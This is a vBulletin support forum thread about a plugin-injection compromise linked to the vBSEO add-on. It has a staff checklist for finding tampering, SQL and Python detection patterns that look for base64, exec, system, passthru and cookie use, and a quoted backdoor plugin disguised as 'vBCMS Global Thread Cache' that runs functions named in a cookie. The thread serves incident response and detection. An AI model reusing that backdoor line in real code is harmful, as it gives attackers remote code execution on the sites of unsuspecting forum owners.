Is This a Default Plugin?

  • Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000
    • 73981

    #31
    Please grep your PHP error log files looking for the following or similar text:

    PHP Parse error: syntax error, unexpected T_STRING in /home/path/public_html/forums/vbseo/includes/functions_vbseocp_abstract.php(637) : regexp code(1) : eval()'d code(29) : eval()'d code on line 2

    Over in the vBSEO forum, they are saying this could signal that you were targeted. There is good information in the patch thread.

    Anyone that has these plugins and does not have vBSEO installed on their server and has never used vBSEO, please open a support ticket if you have support ticket access. Put the subject of FAO: Wayne Luke - Cookie Plugins.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API

    Comment
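The log search described in post #31, as an added example that is not part of the original post: it matches PHP errors raised inside eval()'d code in any file under a vbseo/ directory, so the "or similar text" cases (other error types, other path prefixes) are caught too. The function name, the field names and the sample log lines are constructed for illustration.

```python
import re

# PHP error raised inside eval()'d code, from a file under a vbseo/ directory.
# The error type and the path prefix differ between servers ("or similar text").
EVAL_ERROR = re.compile(
    r"PHP (?P<kind>[A-Za-z ]+):\s+.* in "
    r"(?P<file>\S*/vbseo/\S+\.php)\((?P<line>\d+)\) : .*eval\(\)'d code"
)


def find_eval_errors(lines):
    """Return one dict per matching log line: error kind, file, line, eval depth."""
    hits = []
    for raw in lines:
        m = EVAL_ERROR.search(raw)
        if m:
            hits.append({
                "kind": m["kind"],
                "file": m["file"],
                "line": int(m["line"]),
                "eval_depth": raw.count("eval()'d code"),  # nested eval() levels
            })
    return hits


SAMPLE_LOG = [  # constructed lines; the first reuses the message from the post
    "[01-Jan-2000 00:00:01] PHP Parse error: syntax error, unexpected T_STRING in "
    "/home/path/public_html/forums/vbseo/includes/functions_vbseocp_abstract.php(637)"
    " : regexp code(1) : eval()'d code(29) : eval()'d code on line 2",
    "[01-Jan-2000 00:00:02] PHP Warning:  Division by zero in "
    "/home/path/public_html/forums/showthread.php on line 120",
    "[01-Jan-2000 00:00:03] PHP Fatal error:  Call to undefined function x() in "
    "/home/path/public_html/forums/vbseo/includes/functions_vbseocp_abstract.php(637)"
    " : regexp code(1) : eval()'d code on line 1",
]

if __name__ == "__main__":
    for hit in find_eval_errors(SAMPLE_LOG):
        print(hit)
```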

    • Wayne Luke
      vBulletin Technical Support Lead
      • Aug 2000
      • 73981

      #32
      To check a site for compromises follow these steps:

      1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

      2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

      3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

      4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you. See step #7

      5) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However, some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

      6) Make sure that your plugins do not include calls to exec(), system(), or passthru() or iframes. These are also often signs of a hacked site.

      The following query can be run in phpMyAdmin and will provide results for steps 5 and 6 -
      SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode LIKE '%passthru%' OR phpcode LIKE '%iframe%';

      If you have a plugin that you can't read or the code is obfuscated then you should probably contact the addon author. If it is assigned to the vBulletin, vBulletin CMS, vBulletin Blog or Skimlink products, delete it.

      7) Using phpMyAdmin run this query:
      SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template LIKE '%passthru%' OR template LIKE '%iframe%';

      It checks the templates for compromising code. You will need to review the results from this. If you can't read it or the code is obfuscated then you should revert the template in the Admin CP.

      8) Check .htaccess to make sure there are no redirects there.


      9) Check all plugins in reference to cache or cookies. If they are similar to any of the above, delete them.

      Comment
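The plugin checks in steps 4, 5, 6 and 9 of post #32 can be run together over an export of the plugin table. The sketch below is an added example, not part of the original post or of vBulletin; the rule names, the variable-function-call rule and the last two sample rows are constructed here. The first sample row is the plugin code quoted later in this thread, which the step 5/6 keywords do not match but the cookie and variable-function rules do.

```python
import re

# Indicators from the checklist (steps 4, 5, 6, 9) plus a variable-function-call
# rule. Rule names and sample rows are constructed for this example.
RULES = {
    "include/require (step 4)": re.compile(r"\b(?:include|require)(?:_once)?\b", re.I),
    "base64 (step 5)": re.compile(r"base64", re.I),
    "exec/system/passthru/iframe (step 6)":
        re.compile(r"(?:exec|system|passthru)\s*\(|<\s*iframe", re.I),
    "cookie input (step 9)": re.compile(r"\$_COOKIE\b"),
    # $name(...) or $name[...](...): the function to call comes from a variable
    "variable function call": re.compile(r"\$\w+(?:\[[^\]]*\])*\s*\("),
}
QUERY_KEYWORDS = ("base64", "exec", "system", "passthru", "iframe")


def keyword_query_matches(phpcode):
    """True if a LIKE '%keyword%' search on the step 5/6 keywords would hit."""
    lowered = phpcode.lower()
    return any(k in lowered for k in QUERY_KEYWORDS)


def scan_plugins(rows):
    """Return {title: [rule names]} for each plugin whose phpcode hits a rule."""
    findings = {}
    for row in rows:
        hits = [name for name, rx in RULES.items() if rx.search(row["phpcode"])]
        if hits:
            findings[row["title"]] = hits
    return findings


SAMPLE_ROWS = [  # title/phpcode pairs as exported from the plugin table
    # phpcode copied from the plugin quoted later in this thread
    {"title": "vBCMS Global Thread Cache", "phpcode":
     r'''(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);'''},
    # constructed rows
    {"title": "Loader", "phpcode": '$c = base64_decode("PLACEHOLDER"); include($c);'},
    {"title": "Welcome flag",
     "phpcode": "$show['welcome'] = ($vbulletin->userinfo['userid'] == 0);"},
]

if __name__ == "__main__":
    for title, hits in scan_plugins(SAMPLE_ROWS).items():
        print(f"{title}: {', '.join(hits)}")
```

Every hit still needs manual review: legitimate plugins also use include and cookies, so the output is a shortlist, not a verdict.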

      • Wayne Luke
        vBulletin Technical Support Lead
        • Aug 2000
        • 73981

        #33
        According to the thread on vBSEO.com, the insertion of these plugins should be resolved on their end. You should visit the thread on their security patch for more information.

        Comment

        • Alan_SP
          Senior Member
          • Nov 2009
          • 118
          • 3.8.x

          #34
          Originally posted by Wayne Luke
          According to the thread on vBSEO.com, the insertion of these plugins should be resolved on their end. You should visit the thread on their security patch for more information.
          Well, I deleted the plugin; it hasn't shown up again so far, but I think you should also try to prevent something like this from happening in the future.

          Even though the vector of infection is probably the vBSEO mod, the sheer ability of someone (or something) to create a plugin in this way also looks to me like a security issue with vBulletin. I checked my admincp logs and there was no log entry about the creation of the plugin. I searched far enough back that I'm pretty sure there's no log of this plugin's creation. I think you also need to address this problem of plugin creation. Just in case.

          To me it looks like a security issue with both vBSEO and vBulletin.

          Comment

          • Wayne Luke
            vBulletin Technical Support Lead
            • Aug 2000
            • 73981

            #35
            Originally posted by Alan_SP
            Well, I deleted the plugin; it hasn't shown up again so far, but I think you should also try to prevent something like this from happening in the future.

            Even though the vector of infection is probably the vBSEO mod, the sheer ability of someone (or something) to create a plugin in this way also looks to me like a security issue with vBulletin. I checked my admincp logs and there was no log entry about the creation of the plugin. I searched far enough back that I'm pretty sure there's no log of this plugin's creation. I think you also need to address this problem of plugin creation. Just in case.

            To me it looks like a security issue with both vBSEO and vBulletin.
            You have a plugin installed that was exploited and bypassed security protocols in the software. It is unfortunate, however the only way to prevent this from happening in the future is to remove the entire Plugin and Addon product system from vBulletin. As a vBulletin owner, you should be aware that anything (person or script) with direct access to the Database can do very bad things to the software. Anything with access to all the permissions within the Admin CP can do very bad things to the software. Anything with access to the file system can do very bad things to the software.

            Comment

            • Alan_SP
              Senior Member
              • Nov 2009
              • 118
              • 3.8.x

              #36
              Yes, I understand that and I'm not saying this just to blame someone. I'm more interested in future protection and blocking similar code/exploit from happening.

              Is there any way for the system to additionally check whether it is an admin that creates a plugin and not software (outside of importing a product as a whole)?

              I understand that importing products and creating plugins manually by admins must be allowed, but additional creation of plugins? OK, I'm not saying that I understand this completely; you're more informed and more knowledgeable than I am. I'm just asking: could some sort of safeguard be put in place, with additional checks on what creates plugins and how?

              Comment

              • Zachery
                Former vBulletin Support
                • Jul 2002
                • 59097

                #37
                No, the system doesn't check who installed the plugin, and any checks in place could very easily be circumvented.

                It's an entry in the database.
                If someone gains access to the database, they can make changes without vBulletin knowing.
                If someone gains access to the file system, changes can be made to vBulletin.
                If someone gains access to the admincp and is malicious they can do whatever they like if they have full access.

                We have checks in place that will normally prevent most malicious access. You have to take it the rest of the way.

                Comment

                • Alan_SP
                  Senior Member
                  • Nov 2009
                  • 118
                  • 3.8.x

                  #38
                  Could you make some checks that will notify about tampering with plugins or something like that? DragonByte made a mod that should raise security; could you make something similar to the notification when templates need reverting, but for plugins? I know that there's no 100% security, but I'm just asking if more could be done.

                  For example, there's an option to check files. It could be run once daily, and if it notices strange files in key directories it could notify the admin. If the admin says it's OK, the notification goes away and the file is considered fine. I know that someone could clear this notification, whatever, but I'm just thinking, if it goes in the log (I didn't have anything in the log about this plugin being created) it may help.

                  OK, I'm just asking, thinking about this problem...

                  And yes, you probably should have all security suggestions in one place in the manual, describing everything we could do on our side. And it should be updated regularly.

                  Comment

                  • Wayne Luke
                    vBulletin Technical Support Lead
                    • Aug 2000
                    • 73981

                    #39
                    Originally posted by Alan_SP
                    Could you make some checks that will notify about tampering with plugins or something like that?
                    The system already has checks, permissions, and logging to track and limit changes made through the software.

                    Comment

                    • IcEWoLF
                      Senior Member
                      • Jul 2008
                      • 928
                      • 4.1.x

                      #40
                      Wayne question:

                      vbulletin-read-marker.js File not recognized as part of vBulletin
                      vbulletin-threadbit.js File not recognized as part of vBulletin
                      vbulletin_global.js File not recognized as part of vBulletin
                      They are in ./clientscript

                      Should I be deleting them?
                      The 47 Ronin Gaming - www.47r-squad.com

                      Comment

                      • Wayne Luke
                        vBulletin Technical Support Lead
                        • Aug 2000
                        • 73981

                        #41
                        Originally posted by IcEWoLF
                        Wayne question:



                        They are in ./clientscript

                        Should I be deleting them?
                        They aren't related to this issue. However you can safely delete them. They are files that are no longer used in vBulletin.

                        Comment

                        • IcEWoLF
                          Senior Member
                          • Jul 2008
                          • 928
                          • 4.1.x

                          #42
                          Originally posted by Wayne Luke
                          They aren't related to this issue. However you can safely delete them. They are files that are no longer used in vBulletin.
                          Thanks Wayne!

                          Comment

                          • puertoblack2003
                            Senior Member
                            • Aug 2005
                            • 166
                            • 6.X

                            #43
                            Just a heads up: I too have that same script. But I'm not even using CMS; I have that disabled in plugin. See attached image. I will follow Wayne's intro and remove it and check the log out.

                            I'm using vBSEO 3.6.0

                            Comment

                            • bstillman
                              Senior Member
                              • Jun 2007
                              • 127
                              • 3.8.x

                              #44
                              Is This a Default Plugin?

                              Wow. Wonder if this is a cause for the recent increase in hacked vB sites.

                              Comment

                              • Fready
                                Senior Member
                                • Nov 2010
                                • 137
                                • 4.0.x

                                #45
                                Originally posted by reefland
                                vbCMS Global Thread Cache

                                Code:
                                /* vBCMS Global Thread Cache */
                                (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
                                Wondering if this is related to the vbseo security update. I noticed this plugin after upgrading to 4.1.10 but Brian at vbseo says it looks suspicious.
                                I had the same plug in, I have now deleted it, but how did it get there?
                                I have also done the patch for vbseo

                                Comment
